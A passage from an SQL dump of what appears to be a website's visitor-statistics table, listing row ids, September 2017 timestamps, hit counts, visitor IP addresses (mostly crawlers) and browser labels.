57256,1505607232,1,1,0,0,'180.76.15.153','other'),(157257,1505607459,1,1,0,0,'151.80.27.118','other'),(157258,1505607473,1,1,0,0,'137.74.201.108','other'),(157259,1505607790,2,2,0,0,'69.30.221.250','other'),(157260,1505608121,1,1,0,0,'8.29.198.25','other'),(157261,1505608868,1,1,0,0,'51.255.65.92','other'),(157262,1505609132,1,1,0,0,'217.182.132.172','other'),(157263,1505609186,1,1,0,0,'51.255.71.111','other'),(157264,1505609982,2,2,0,0,'51.255.71.123','other'),(157265,1505610466,2,2,0,0,'5.45.207.64','other'),(157266,1505610963,32,32,0,0,'142.4.200.37','other'),(157267,1505611010,1,1,0,0,'164.132.162.155','other'),(157268,1505611433,1,1,0,0,'5.45.207.64','other'),(157269,1505612091,1,1,0,0,'151.80.27.118','other'),(157270,1505612609,1,1,0,0,'51.255.65.64','other'),(157271,1505613520,1,1,0,0,'5.45.207.64','other'),(157272,1505614326,2,2,0,0,'141.8.183.1','other'),(157273,1505614616,1,1,0,0,'217.182.132.25','other'),(157274,1505615120,1,1,0,0,'217.182.132.7','other'),(157275,1505615629,1,1,0,0,'137.74.203.194','other'),(157276,1505615827,1,1,0,0,'141.8.183.1','other'),(157277,1505615921,1,1,0,0,'51.255.71.126','other'),(157278,1505616300,1,1,0,0,'51.255.65.63','other'),(157279,1505616476,1,1,0,0,'5.45.207.64','other'),(157280,1505617852,1,1,0,0,'137.74.203.194','other'),(157281,1505617901,1,1,0,0,'217.182.132.22','other'),(157282,1505618110,1,1,0,0,'217.182.132.14','other'),(157283,1505618953,1,1,0,0,'8.29.198.26','other'),(157284,1505619277,1,1,0,0,'46.161.9.39','chrome'),(157285,1505619882,1,1,0,0,'51.255.65.44','other'),(157286,1505620116,1,1,0,0,'157.55.39.42','other'),(157287,1505620228,1,1,0,0,'217.69.133.194','other'),(157288,1505620291,1,1,0,0,'5.45.207.64','other'),(157289,1505620301,1,1,0,0,'51.255.65.49','other'),(157290,1505620534,1,1,0,0,'217.182.132.55','other'),(157291,1505621627,1,1,0,0,'176.77.19.153','msie'),(157292,1505621629,1,1,0,0,'95.28.205.117','msie'),(157293,1505621631,1,1,0,0,'46.188.90.93','msie'),(157294,1505621632,1,1,0,0,'95.220.193.14','msie'),(157296,1505621634,1,1,0,0,'95.221.52.39','msie'),(157297,1505621635,1,1,0,0,'176.14.226.58','msie'),(157299,1505622352,1,1,0,0,'51.255.71.131','other'),(157300,1505622821,1,1,0,0,'51.255.64.106','other'),(157301,1505623474,1,1,0,0,'51.255.65.34','other'),(157302,1505623871,1,1,0,0,'51.255.65.66','other'),(157303,1505625177,1,1,0,0,'141.8.183.1','other'),(157304,1505625364,1,1,0,0,'164.132.162.187','other'),(157305,1505625736,1,1,0,0,'217.182.132.20','other'),(157306,1505625887,1,1,0,0,'51.255.65.5','other'),(157307,1505625924,1,1,0,0,'217.182.132.193','other'),(157308,1505626092,1,1,0,0,'134.249.183.229','chrome'),(157309,1505626169,1,1,0,0,'51.255.71.117','other'),(157310,1505626227,2,2,0,0,'91.209.11.236','other'),(157311,1505626666,1,1,0,0,'51.255.65.27','other'),(157312,1505627483,1,1,0,0,'91.209.11.236','other'),(157313,1505627754,1,1,0,0,'51.255.71.112','other'),(157314,1505628271,1,1,0,0,'51.255.65.53','other'),(157315,1505628613,1,1,0,0,'141.8.183.1','other'),(157316,1505628690,1,1,0,0,'5.141.211.12','chrome'),(157317,1505629071,1,1,0,0,'5.45.207.64','other'),(157318,1505629218,1,1,0,0,'217.182.132.5','other'),(157319,1505629788,1,1,0,0,'8.29.198.25','other'),(157320,1505629792,1,1,0,0,'51.255.65.67','other'),(157321,1505630051,1,1,0,0,'78.111.185.140','chrome'),(157322,1505630258,1,1,0,0,'217.182.132.186','other'),(157323,1505630785,1,1,0,0,'51.255.65.32','other'),(157324,1505631896,1,1,0,0,'217.182.132.50','other'),(157325,1505632261,1,1,0,0,'213.180.203.32','other'),(157326,1505632530,1,1,0,0,'107.167.109.52','other'),(157327,1505632576,6,6,0,0,'91.121.109.55','other'),(157328,1505632604,1,1,0,0,'51.255.65.32','other'),(157329,1505632881,1,1,0,0,'51.255.65.36','other'),(157330,1505634115,1,1,0,0,'91.196.178.131','chrome'),(157331,1505635377,2,2,0,0,'141.8.183.1','other'),(157332,1505635572,1,1,0,0,'5.45.207.64','other'),(157333,1505635668,1,1,0,0,'217.182.132.21','other'),(157334,1505635740,1,1,0,0,'217.182.132.53','other'),(157335,1505635801,1,1,0,0,'51.255.65.44','other'),(157336,1505635891,1,1,0,0,'217.182.132.96','other'),(157337,1505637618,1,1,0,0,'217.182.132.174','other'),(157338,1505638041,1,1,0,0,'51.255.65.54','other'),(157339,1505638983,1,1,0,0,'216.244.66.237','other'),(157340,1505639038,1,1,0,0,'5.45.207.64','other'),(157341,1505640351,1,1,0,0,'51.255.65.61','other'),(157342,1505640505,1,1,0,0,'51.255.65.27','other'),(157343,1505640571,5,5,0,0,'192.99.203.35','other'),(157344,1505640628,1,1,0,0,'8.29.198.25','other'),(157345,1505641053,1,1,0,0,'217.182.132.62','other'),(157346,1505641606,1,1,0,0,'217.182.132.82','other'),(157347,1505642018,1,1,0,0,'217.182.132.60','other'),(157348,1505642149,1,1,0,0,'217.182.132.151','other'),(157349,1505642531,1,1,0,0,'5.45.207.64','other'),(157350,1505642799,1,1,0,0,'217.182.132.146','other'),(157351,1505642948,1,1,0,0,'217.182.132.173','other'),(157352,1505642964,1,1,0,0,'216.244.66.237','other'),(157353,1505643539,1,1,0,0,'217.182.132.21','other'),(157354,1505644051,1,1,0,0,'137.74.207.120','other'),(157355,1505644066,1,1,0,0,'51.255.71.131','other'),(157356,1505644201,1,1,0,0,'217.182.132.18','other'),(157357,1505644582,1,1,0,0,'51.255.71.128','other'),(157358,1505644614,1,1,0,0,'51.255.71.110','other'),(157359,1505645123,3,3,0,0,'5.9.144.234','other'),(157360,1505645534,1,1,0,0,'51.255.65.46','other'),(157361,1505645856,1,1,0,0,'5.255.253.2','other'),(157362,1505646411,1,1,0,0,'51.255.65.70','other'),(157363,1505647396,1,1,0,0,'217.182.132.91','other'),(157364,1505647404,1,1,0,0,'51.255.65.52','other'),(157365,1505647764,1,1,0,0,'37.9.113.78','other'),(157366,1505647997,1,1,0,0,'176.195.97.248','msie'),(157367,1505648150,1,1,0,0,'5.45.207.57','other'),(157368,1505648314,1,1,0,0,'51.255.65.61','other'),(157369,1505648919,1,1,0,0,'109.63.201.122','msie'),(157370,1505649120,1,1,0,0,'217.182.132.97','other'),(157371,1505649194,1,1,0,0,'199.58.86.209','other'),(157372,1505649743,1,1,0,0,'217.182.132.157','other'),(157373,1505649863,1,1,0,0,'81.1.242.33','other'),(157374,1505650132,1,1,0,0,'51.255.65.39','other'),(157375,1505650362,1,1,0,0,'51.255.65.33','other'),(157376,1505650685,2,2,0,0,'213.136.77.237','other'),(157377,1505651124,1,1,0,0,'217.182.132.153','other'),(157378,1505651457,1,1,0,0,'8.29.198.25','other'),(157379,1505651671,1,1,0,0,'66.249.66.195','chrome'),(157380,1505653220,1,1,0,0,'5.45.207.64','other'),(157381,1505654169,1,1,0,0,'51.255.65.23','other'),(157382,1505654298,1,1,0,0,'51.255.65.30','other'),(157383,1505654493,1,0,1,0,'66.249.66.201',''),(157384,1505654715,1,1,0,0,'178.154.200.7','other'),(157385,1505655165,1,1,0,0,'217.182.132.30','other'),(157386,1505655324,1,1,0,0,'51.255.65.90','other'),(157387,1505655473,1,1,0,0,'40.77.167.36','other'),(157388,1505655726,1,1,0,0,'107.167.108.186','opera'),(157389,1505656566,1,1,0,0,'220.181.132.192','chrome'),(157390,1505656594,1,1,0,0,'106.120.162.111','chrome'),(157391,1505656820,1,1,0,0,'217.182.132.57','other'),(157392,1505656935,1,1,0,0,'40.77.167.46','other'),(157393,1505657470,2,2,0,0,'5.45.207.64','other'),(157394,1505657797,1,1,0,0,'51.255.65.27','other'),(157395,1505657884,1,1,0,0,'51.255.65.95','other'),(157396,1505657979,1,1,0,0,'142.4.200.37','other'),(157397,1505658567,1,1,0,0,'217.182.132.65','other'),(157398,1505658691,1,1,0,0,'51.255.65.18','other'),(157399,1505658902,1,1,0,0,'157.55.39.42','other'),(157400,1505659218,1,1,0,0,'51.255.65.28','other'),(157401,1505659264,1,1,0,0,'128.72.208.243','chrome'),(157402,1505659408,1,0,1,0,'66.249.66.75',''),(157403,1505659860,1,1,0,0,'51.255.65.79','other'),(157404,1505660038,1,1,0,0,'51.255.65.3','other'),(157405,1505660240,2,2,0,0,'5.45.207.64','other'),(157406,1505660420,1,1,0,0,'217.182.132.20','other'),(157407,1505660449,1,1,0,0,'51.255.65.85','other'),(157408,1505660550,1,1,0,0,'51.255.65.26','other'),(157409,1505660664,1,1,0,0,'40.77.167.36','other'),(157410,1505660890,1,1,0,0,'217.182.132.173','other'),(157411,1505661420,1,1,0,0,'217.182.132.179','other'),(157412,1505661434,1,1,0,0,'51.255.71.130','other'),(157413,1505662286,1,1,0,0,'8.29.198.25','other'),(157414,1505662315,1,1,0,0,'37.9.113.163','other'),(157415,1505662460,1,1,0,0,'141.8.183.19','other'),(157416,1505662465,1,1,0,0,'217.182.132.7','other'),(157417,1505663158,1,1,0,0,'217.182.132.28','other'),(157418,1505663809,1,1,0,0,'51.255.65.13','other'),(157419,1505664745,1,0,1,0,'66.249.66.74',''),(157420,1505664932,1,1,0,0,'37.52.61.51','other'),(157421,1505664976,1,1,0,0,'217.182.132.21','other'),(157422,1505665496,1,1,0,0,'157.55.39.42','other'),(157423,1505665768,1,1,0,0,'216.244.66.237','other'),(157424,1505665796,1,1,0,0,'217.182.132.65','other'),(157425,1505665951,1,1,0,0,'141.8.142.56','other'),(157426,1505666812,1,1,0,0,'180.76.15.139','other'),(157427,1505666908,1,1,0,0,'51.255.65.55','other'),(157428,1505667035,1,1,0,0,'5.45.207.26','other'),(157429,1505667101,1,1,0,0,'95.108.181.60','other'),(157430,1505667595,1,1,0,0,'37.9.113.180','other'),(157431,1505668245,2,2,0,0,'40.77.167.1','other'),(157432,1505668519,1,1,0,0,'51.255.65.67','other'),(157433,1505668550,1,1,0,0,'178.154.200.36','other'),(157434,1505669198,1,1,0,0,'217.182.132.29','other'),(157435,1505669522,1,1,0,0,'37.9.113.195','other'),(157436,1505669888,1,1,0,0,'137.74.207.188','other'),(157437,1505670638,1,1,0,0,'51.255.71.98','other'),(157438,1505671353,1,1,0,0,'51.255.65.76','other'),(157439,1505671509,1,1,0,0,'217.182.132.170','other'),(157440,1505671679,1,1,0,0,'137.74.207.101','other'),(157441,1505671746,1,1,0,0,'217.182.132.179','other'),(157442,1505672110,1,1,0,0,'5.255.253.2','other'),(157443,1505672780,3,3,0,0,'91.209.11.236','other'),(157444,1505672845,1,1,0,0,'217.69.133.2','other'),(157445,1505673091,1,1,0,0,'217.182.132.18','other'),(157446,1505673120,1,1,0,0,'8.29.198.27','other'),(157447,1505673408,1,1,0,0,'217.182.132.178','other'),(157448,1505673509,2,2,0,0,'51.255.65.22','other'),(157449,1505673887,1,1,0,0,'217.182.132.58','other'),(157450,1505674828,1,1,0,0,'217.182.132.83','other'),(157451,1505675128,1,1,0,0,'51.255.65.35','other'),(157452,1505675376,1,1,0,0,'137.74.207.164','other'),(157453,1505675671,1,1,0,0,'217.182.132.59','other'),(157454,1505676655,1,1,0,0,'141.8.183.20','other'),(157455,1505676668,1,1,0,0,'51.255.71.132','other'),(157456,1505677440,1,1,0,0,'81.1.242.33','other'),(157457,1505677801,1,1,0,0,'137.74.207.116','other'),(157458,1505678510,1,1,0,0,'141.8.132.26','other'),(157459,1505678740,1,1,0,0,'91.209.11.236','other'),(157460,1505679471,1,1,0,0,'188.163.16.6','chrome'),(157461,1505679749,1,1,0,0,'51.255.65.70','other'),(157462,1505679944,1,1,0,0,'157.55.39.42','other'),(157463,1505680022,1,1,0,0,'91.209.11.236','other'),(157464,1505680319,1,1,0,0,'180.76.15.27','other'),(157465,1505680570,1,1,0,0,'217.182.132.86','other'),(157466,1505681398,1,1,0,0,'5.45.207.64','other'),(157467,1505681871,1,1,0,0,'91.209.11.236','other'),(157468,1505681945,1,1,0,0,'51.255.65.80','other'),(157469,1505682211,1,1,0,0,'66.249.66.74','chrome'),(157470,1505682220,1,1,0,0,'217.182.132.62','other'),(157471,1505683152,1,1,0,0,'217.182.132.24','other'),(157472,1505683434,1,0,1,0,'66.249.66.76',''),(157473,1505683568,1,1,0,0,'51.255.65.66','other'),(157474,1505683739,1,0,1,0,'66.249.66.74',''),(157475,1505683957,1,1,0,0,'8.29.198.26','other'),(157476,1505683989,1,1,0,0,'91.209.11.236','other'),(157477,1505684477,1,1,0,0,'217.182.132.148','other'),(157478,1505684966,1,0,1,0,'66.249.66.75',''),(157479,1505685402,1,1,0,0,'217.182.132.174','other'),(157480,1505685464,2,2,0,0,'91.209.11.236','other'),(157481,1505685846,1,1,0,0,'137.74.207.109','other'),(157482,1505685870,1,1,0,0,'51.255.65.63','other'),(157483,1505686301,1,1,0,0,'51.255.71.128','other'),(157484,1505686385,1,1,0,0,'207.46.13.176','other'),(157485,1505686492,1,1,0,0,'51.255.65.23','other'),(157486,1505686538,1,1,0,0,'51.255.71.125','other'),(157487,1505686652,1,1,0,0,'51.255.71.110','other'),(157488,1505687260,1,1,0,0,'40.77.167.46','other'),(157489,1505687432,1,1,0,0,'5.45.207.64','other'),(157490,1505687614,1,0,1,0,'66.249.66.74',''),(157491,1505688510,1,1,0,0,'51.255.65.33','other'),(157492,1505688534,1,1,0,0,'217.182.132.97','other'),(157493,1505688961,1,1,0,0,'217.182.132.94','other'),(157494,1505689029,1,1,0,0,'51.255.71.112','other'),(157495,1505689616,1,1,0,0,'141.8.183.1','other'),(157496,1505689878,1,1,0,0,'91.209.11.236','other'),(157497,1505690796,1,1,0,0,'5.255.253.33','other'),(157498,1505691494,1,1,0,0,'151.80.27.116','other'),(157499,1505691709,1,1,0,0,'51.255.65.85','other'),(157500,1505691912,1,1,0,0,'91.209.11.236','other'),(157501,1505692196,1,1,0,0,'51.255.65.80','other'),(157502,1505693938,1,1,0,0,'51.255.65.65','other'),(157503,1505694316,1,1,0,0,'51.255.65.56','other'),(157504,1505694402,2,2,0,0,'91.209.11.236','other'),(157505,1505694586,1,1,0,0,'5.45.207.64','other'),(157506,1505694806,1,1,0,0,'8.29.198.25','other'),(157507,1505694929,1,1,0,0,'164.132.164.180','other'),(157508,1505695380,1,1,0,0,'51.255.65.25','other'),(157509,1505695508,1,1,0,0,'51.255.65.44','other'),(157510,1505696063,1,1,0,0,'164.132.164.180','other'),(157511,1505696866,2,2,0,0,'91.209.11.236','other'),(157512,1505696971,1,1,0,0,'5.45.207.43','other'),(157513,1505697224,1,1,0,0,'151.80.27.118','other'),(157514,1505697521,1,1,0,0,'51.255.71.118','other'),(157515,1505698116,1,1,0,0,'217.182.132.73','other'),(157516,1505698452,1,1,0,0,'217.182.132.88','other'),(157517,1505698813,1,1,0,0,'51.255.71.127','other'),(157518,1505699049,1,1,0,0,'141.8.142.21','other'),(157519,1505699819,2,2,0,0,'91.209.11.236','other'),(157520,1505700131,1,1,0,0,'217.182.132.76','other'),(157521,1505700881,1,1,0,0,'217.182.132.6','other'),(157522,1505700901,1,1,0,0,'91.209.11.236','other'),(157523,1505701305,1,1,0,0,'216.244.66.237','other'),(157524,1505701634,1,1,0,0,'81.1.242.33','other'),(157525,1505701655,1,1,0,0,'217.182.132.83','other'),(157526,1505701717,1,1,0,0,'5.45.207.64','other'),(157527,1505702026,2,2,0,0,'141.8.183.1','other'),(157528,1505702111,1,0,1,0,'66.249.66.201',''),(157529,1505702500,1,1,0,0,'137.74.207.161','other'),(157530,1505702528,1,1,0,0,'91.209.11.236','other'),(157531,1505702756,1,1,0,0,'51.255.65.79','other'),(157532,1505702882,1,1,0,0,'51.255.65.12','other'),(157533,1505702982,1,0,1,0,'66.249.66.199',''),(157534,1505703004,1,1,0,0,'51.255.65.45','other'),(157535,1505703527,2,2,0,0,'91.209.11.236','other'),(157536,1505703690,1,1,0,0,'217.182.132.176','other'),(157537,1505704356,1,1,0,0,'37.9.113.128','other'),(157538,1505704606,1,1,0,0,'51.255.65.52','other'),(157539,1505704866,1,1,0,0,'5.45.207.64','other'),(157540,1505705461,1,1,0,0,'51.255.65.60','other'),(157541,1505705646,1,1,0,0,'8.29.198.25','other'),(157542,1505705740,1,1,0,0,'217.182.132.25','other'),(157543,1505705941,1,1,0,0,'51.255.65.43','other'),(157544,1505705979,1,1,0,0,'51.255.65.8','other'),(157545,1505707286,1,1,0,0,'51.255.65.24','other'),(157546,1505707426,1,1,0,0,'137.74.207.110','other'),(157547,1505707430,1,1,0,0,'217.182.132.174','other'),(157548,1505708028,1,1,0,0,'91.209.11.236','other'),(157549,1505708127,1,0,1,0,'66.249.66.195',''),(157550,1505708260,1,1,0,0,'217.182.132.91','other'),(157551,1505708581,1,1,0,0,'5.45.207.64','other'),(157552,1505708710,1,1,0,0,'217.182.132.86','other'),(157553,1505709038,1,1,0,0,'107.167.105.230','opera'),(157554,1505709391,1,1,0,0,'51.255.71.129','other'),(157555,1505709486,1,1,0,0,'51.255.65.36','other'),(157556,1505709659,1,1,0,0,'51.255.71.131','other'),(157557,1505710082,1,1,0,0,'217.182.132.19','other'),(157558,1505710138,1,1,0,0,'51.255.65.64','other'),(157559,1505710235,2,2,0,0,'91.209.11.236','other'),(157560,1505710376,1,1,0,0,'217.182.132.186','other'),(157561,1505710838,1,1,0,0,'217.182.132.146','other'),(157562,1505711239,1,1,0,0,'51.255.65.56','other'),(157563,1505711284,1,1,0,0,'91.196.178.69','firefox'),(157564,1505711705,1,1,0,0,'51.255.65.33','other'),(157565,1505711826,1,1,0,0,'188.163.17.31','chrome'),(157566,1505711891,2,2,0,0,'91.209.11.236','other'),(157567,1505712211,1,1,0,0,'141.8.142.17','other'),(157568,1505712242,1,1,0,0,'137.74.207.108','other'),(157569,1505712514,1,1,0,0,'217.182.132.5','other'),(157570,1505712832,1,1,0,0,'81.1.242.33','other'),(157571,1505712857,2,2,0,0,'95.213.141.126','opera'),(157572,1505712870,1,1,0,0,'188.166.36.209','chrome'),(157573,1505712892,1,1,0,0,'141.8.183.1','other'),(157574,1505712960,1,1,0,0,'217.182.132.73','other'),(157575,1505712965,1,1,0,0,'66.102.9.27','chrome'),(157576,1505713170,1,1,0,0,'217.182.132.188','other'),(157577,1505713197,1,1,0,0,'217.182.132.91','other'),(157578,1505713712,1,1,0,0,'51.255.65.67','other'),(157579,1505713937,1,1,0,0,'51.255.71.113','other'),(157580,1505714199,1,1,0,0,'51.255.71.100','other'),(157581,1505714251,1,1,0,0,'141.8.183.1','other'),(157582,1505714307,1,1,0,0,'51.255.65.8','other'),(157583,1505714485,1,1,0,0,'91.196.178.65','chrome'),(157584,1505714538,1,1,0,0,'91.196.178.68','firefox'),(157585,1505714792,1,1,0,0,'137.74.207.170','other'),(157586,1505714833,1,1,0,0,'217.182.132.59','other'),(157587,1505714844,1,1,0,0,'91.196.178.166','chrome'),(157588,1505715102,1,1,0,0,'91.209.11.236','other'),(157589,1505715333,1,1,0,0,'217.182.132.62','other'),(157590,1505716130,1,1,0,0,'178.154.200.36','other'),(157591,1505716483,1,1,0,0,'8.29.198.27','other'),(157592,1505716798,1,1,0,0,'141.8.183.2','other'),(157593,1505716891,1,1,0,0,'217.182.132.6','other'),(157594,1505717831,1,1,0,0,'91.209.11.236','other'),(157595,1505717844,1,1,0,0,'188.166.31.68','chrome'),(157596,1505718030,1,1,0,0,'217.182.132.154','other'),(157597,1505718666,1,1,0,0,'141.8.183.1','other'),(157598,1505719700,1,1,0,0,'91.196.178.134','firefox'),(157599,1505719967,1,1,0,0,'212.90.60.61','firefox'),(157600,1505720139,3,3,0,0,'173.234.153.122','other'),(157601,1505720226,1,1,0,0,'91.196.177.110','chrome'),(157602,1505720529,1,1,0,0,'217.69.133.6','other'),(157603,1505722183,1,1,0,0,'217.182.132.188','other'),(157604,1505722312,1,0,1,0,'68.180.228.221',''),(157605,1505722570,1,1,0,0,'91.209.11.236','other'),(157606,1505722694,1,1,0,0,'54.165.59.7','other'),(157607,1505722956,1,1,0,0,'37.9.113.94','other'),(157608,1505723091,1,1,0,0,'91.196.178.67','chrome'),(157609,1505723270,1,1,0,0,'217.182.132.68','other'),(157610,1505723352,3,3,0,0,'91.196.177.46','chrome'),(157611,1505723581,1,1,0,0,'5.45.207.56','other'),(157612,1505723839,1,1,0,0,'185.137.18.111','chrome'),(157613,1505724195,1,1,0,0,'54.165.59.7','other'),(157614,1505724690,1,1,0,0,'217.182.132.94','other'),(157615,1505724762,1,1,0,0,'37.73.238.201','chrome'),(157616,1505724917,1,1,0,0,'91.196.177.15','firefox'),(157617,1505725161,1,1,0,0,'91.196.177.15','chrome'),(157618,1505725323,1,0,1,0,'66.249.66.201',''),(157619,1505725521,1,1,0,0,'54.165.59.7','other'),(157620,1505725620,1,1,0,0,'217.182.132.183','other'),(157621,1505727223,1,1,0,0,'5.45.207.64','other'),(157622,1505727317,1,1,0,0,'8.29.198.25','other'),(157623,1505727319,1,1,0,0,'217.182.132.188','other'),(157624,1505727405,1,1,0,0,'217.182.132.183','other'),(157625,1505727540,1,1,0,0,'91.196.177.15','chrome'),(157626,1505727942,1,1,0,0,'217.182.132.71','other'),(157627,1505728828,2,2,0,0,'91.196.178.68','chrome'),(157628,1505729278,1,1,0,0,'217.182.132.53','other'),(157629,1505729432,1,1,0,0,'188.163.16.6','chrome'),(157630,1505730037,1,1,0,0,'51.255.65.34','other'),(157631,1505730159,1,1,0,0,'217.182.132.17','other'),(157632,1505730252,1,1,0,0,'51.255.65.18','other'),(157633,1505731043,1,1,0,0,'5.45.207.64','other'),(157634,1505731857,1,1,0,0,'141.8.142.21','other'),(157635,1505732267,1,1,0,0,'141.8.142.43','other'),(157636,1505732602,1,1,0,0,'217.182.132.28','other'),(157637,1505732751,1,1,0,0,'164.132.162.187','other'),(157638,1505732910,1,1,0,0,'91.124.82.129','chrome'),(157639,1505732921,1,1,0,0,'51.255.71.133','other'),(157640,1505733090,1,1,0,0,'46.200.123.15','firefox'),(157641,1505733621,1,1,0,0,'5.45.207.15','other'),(157642,1505733674,1,1,0,0,'40.77.167.46','other'),(157643,1505733699,1,1,0,0,'178.136.15.246','chrome'),(157644,1505734295,1,1,0,0,'91.196.178.69','firefox'),(157645,1505734367,1,1,0,0,'51.255.65.95','other'),(157646,1505735287,1,1,0,0,'107.167.105.115','opera'),(157647,1505735350,1,1,0,0,'51.255.65.30','other'),(157648,1505735384,1,1,0,0,'51.255.65.7','other'),(157649,1505735574,1,1,0,0,'78.111.190.32','chrome'),(157650,1505736237,1,1,0,0,'91.196.178.166','chrome'),(157651,1505736290,1,1,0,0,'5.45.207.15','other'),(157652,1505736649,1,1,0,0,'91.196.177.46','chrome'),(157653,1505737110,1,1,0,0,'213.180.203.32','other'),(157654,1505737378,1,1,0,0,'37.54.22.131','chrome'),(157655,1505737414,1,1,0,0,'31.13.113.189','other'),(157656,1505737416,1,1,0,0,'31.13.114.71','other'),(157657,1505737424,1,1,0,0,'31.13.113.197','other'),(157658,1505737425,1,1,0,0,'31.13.113.195','other'),(157659,1505737447,1,1,0,0,'66.220.151.183','other'),(157660,1505737499,1,1,0,0,'40.77.167.47','other'),(157661,1505737718,1,1,0,0,'107.167.105.82','opera'),(157662,1505737876,1,1,0,0,'141.8.183.20','other'),(157663,1505738118,1,1,0,0,'77.222.155.89','chrome'),(157664,1505738155,1,1,0,0,'8.29.198.25','other'),(157665,1505738495,1,1,0,0,'217.182.132.21','other'),(157666,1505738555,1,1,0,0,'217.182.132.52','other'),(157667,1505738600,2,2,0,0,'91.196.177.46','chrome'),(157668,1505738607,1,1,0,0,'40.77.167.47','other'),(157669,1505738682,1,1,0,0,'217.182.132.186','other'),(157670,1505739446,1,1,0,0,'5.45.207.64','other'),(157671,1505739776,1,1,0,0,'51.255.65.53','other'),(157672,1505740537,1,1,0,0,'51.255.65.94','other'),(157673,1505740582,1,1,0,0,'125.209.235.174','other'),(157674,1505740664,1,1,0,0,'91.196.178.68','chrome'),(157675,1505740783,1,1,0,0,'91.196.178.69','firefox'),(157676,1505740887,1,1,0,0,'81.1.242.33','other'),(157677,1505740920,1,1,0,0,'217.182.132.180','other'),(157678,1505740990,1,1,0,0,'37.54.22.131','chrome'),(157679,1505741434,1,1,0,0,'109.173.25.162','msie'),(157680,1505741501,1,1,0,0,'5.45.207.64','other'),(157681,1505741505,1,1,0,0,'141.8.142.21','other'),(157682,1505741670,1,1,0,0,'46.48.13.161','chrome'),(157683,1505741728,1,1,0,0,'40.77.167.47','other'),(157684,1505742490,1,1,0,0,'128.199.63.237','firefox'),(157685,1505742631,1,1,0,0,'217.182.132.51','other'),(157686,1505742929,1,1,0,0,'5.45.207.64','other'),(157687,1505743249,1,1,0,0,'51.255.65.224','other'),(157688,1505743577,1,1,0,0,'217.182.132.176','other'),(157689,1505743803,2,2,0,0,'91.209.11.236','other'),(157690,1505743900,1,1,0,0,'51.255.71.129','other'),(157691,1505743952,1,1,0,0,'51.255.65.64','other'),(157692,1505744094,1,1,0,0,'91.196.177.42','chrome'),(157693,1505744238,1,1,0,0,'91.196.178.134','firefox'),(157694,1505744501,1,1,0,0,'5.45.207.64','other'),(157695,1505744813,1,1,0,0,'141.8.183.1','other'),(157696,1505745271,2,2,0,0,'91.209.11.236','other'),(157697,1505745416,1,1,0,0,'46.211.114.144','other'),(157698,1505745499,1,1,0,0,'40.77.167.47','other'),(157699,1505746146,1,1,0,0,'37.73.242.212','chrome'),(157700,1505746557,1,1,0,0,'91.196.178.161','chrome'),(157701,1505747694,1,1,0,0,'51.255.71.117','other'),(157702,1505747815,1,1,0,0,'107.167.105.82','opera'),(157703,1505747886,1,1,0,0,'51.255.65.78','other'),(157704,1505748862,2,2,0,0,'91.209.11.236','other'),(157705,1505749000,1,1,0,0,'8.29.198.25','other'),(157706,1505749043,1,1,0,0,'107.167.107.56','opera'),(157707,1505749969,1,1,0,0,'217.182.132.32','other'),(157708,1505749999,1,1,0,0,'51.255.65.52','other'),(157709,1505750910,1,1,0,0,'217.182.132.64','other'),(157710,1505750940,1,1,0,0,'217.182.132.157','other'),(157711,1505750980,1,1,0,0,'217.182.132.72','other'),(157712,1505751085,1,1,0,0,'217.182.132.147','other'),(157713,1505751448,1,1,0,0,'188.255.16.153','msie'),(157714,1505752362,1,1,0,0,'91.209.11.236','other'),(157715,1505752462,1,1,0,0,'85.235.59.37','other'),(157716,1505752792,1,1,0,0,'217.182.132.147','other'),(157717,1505753109,1,1,0,0,'107.167.109.12','other'),(157718,1505753244,1,1,0,0,'51.255.65.39','other'),(157719,1505753972,1,1,0,0,'217.182.132.19','other'),(157720,1505754383,1,1,0,0,'51.255.65.16','other'),(157721,1505754898,1,1,0,0,'51.255.64.106','other'),(157722,1505755404,1,1,0,0,'40.77.167.47','other'),(157723,1505755575,1,1,0,0,'180.76.15.149','other'),(157724,1505756326,1,1,0,0,'37.54.22.131','chrome'),(157725,1505756335,1,1,0,0,'217.69.133.5','other'),(157726,1505756986,1,1,0,0,'108.59.8.70','other'),(157727,1505757300,1,1,0,0,'91.220.61.188','chrome'),(157728,1505757657,1,1,0,0,'37.53.228.222','chrome'),(157729,1505758140,1,1,0,0,'207.46.13.18','other'),(157730,1505758533,1,1,0,0,'91.196.178.167','chrome'),(157731,1505758632,1,1,0,0,'207.46.13.98','other'),(157732,1505758663,2,2,0,0,'91.209.11.236','other'),(157733,1505759185,1,1,0,0,'65.55.210.109','other'),(157734,1505759648,1,1,0,0,'137.74.207.108','other'),(157735,1505759812,1,1,0,0,'5.45.207.64','other'),(157736,1505759839,1,1,0,0,'8.29.198.27','other'),(157737,1505760440,2,0,2,0,'66.249.66.201',''),(157738,1505760481,1,1,0,0,'51.255.65.59','other'),(157739,1505760857,1,1,0,0,'51.255.65.58','other'),(157740,1505760981,1,1,0,0,'66.249.66.199','chrome'),(157741,1505761242,1,1,0,0,'95.108.181.63','other'),(157742,1505761271,1,1,0,0,'217.182.132.19','other'),(157743,1505761304,1,1,0,0,'91.209.11.236','other'),(157744,1505761482,1,1,0,0,'51.255.65.35','other'),(157745,1505761680,1,1,0,0,'217.182.132.25','other'),(157746,1505761682,1,1,0,0,'137.74.207.109','other'),(157747,1505761927,1,1,0,0,'91.196.178.134','chrome'),(157748,1505762677,1,1,0,0,'51.255.71.122','other'),(157749,1505762895,1,1,0,0,'91.209.11.236','other'),(157750,1505763008,1,1,0,0,'95.134.221.181','chrome'),(157751,1505763088,1,1,0,0,'37.9.113.180','other'),(157752,1505763571,1,1,0,0,'91.196.178.168','chrome'),(157753,1505764202,1,1,0,0,'5.45.207.64','other'),(157754,1505764308,1,1,0,0,'51.255.65.84','other'),(157755,1505764474,1,1,0,0,'137.74.207.119','other'),(157756,1505764500,1,1,0,0,'51.255.65.23','other'),(157757,1505764872,1,1,0,0,'51.255.65.19','other'),(157758,1505765632,1,1,0,0,'51.255.71.125','other'),(157759,1505766109,1,1,0,0,'217.182.132.30','other'),(157760,1505766321,1,1,0,0,'217.182.132.4','other'),(157761,1505766446,1,1,0,0,'141.8.183.1','other'),(157762,1505766522,1,0,1,0,'68.180.228.221',''),(157763,1505767186,1,1,0,0,'40.77.167.46','other'),(157764,1505767529,1,1,0,0,'217.182.132.188','other'),(157765,1505768294,2,2,0,0,'54.165.59.7','other'),(157766,1505768627,3,3,0,0,'141.8.183.1','other'),(157767,1505768943,1,1,0,0,'164.132.162.155','other'),(157768,1505769324,2,2,0,0,'54.165.59.7','other'),(157769,1505769810,1,1,0,0,'40.77.167.47','other'),(157770,1505769914,1,0,1,0,'66.249.66.201',''),(157771,15057